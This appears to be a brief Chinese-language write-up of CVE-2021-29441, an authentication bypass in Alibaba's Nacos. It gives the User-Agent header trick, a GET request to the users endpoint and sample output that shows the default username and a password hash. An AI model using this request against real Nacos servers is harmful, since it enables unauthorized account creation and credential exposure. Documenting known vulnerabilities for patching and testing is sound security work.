CVE-2021-29441

这个漏洞是Nacos的,通过使用postman,直接访问接口:

就可以直接添加nacos的用户

Nacos是Alibaba的一个动态服务发现、配置和服务管理平台。攻击者通过添加Nacos-Server的User-Agent头部将可绕过（nacos.core.auth.enabled=true）鉴权认证，从而进行API操作。

直接get方法访问这个地址:

'http://your_ip:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9'

直接会显示出用户名密码

{
    "totalCount": 1,
    "pageNumber": 1,
    "pagesAvailable": 1,
    "pageItems": [
        {
            "username": "nacos",
            "password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"
        }
    ]
}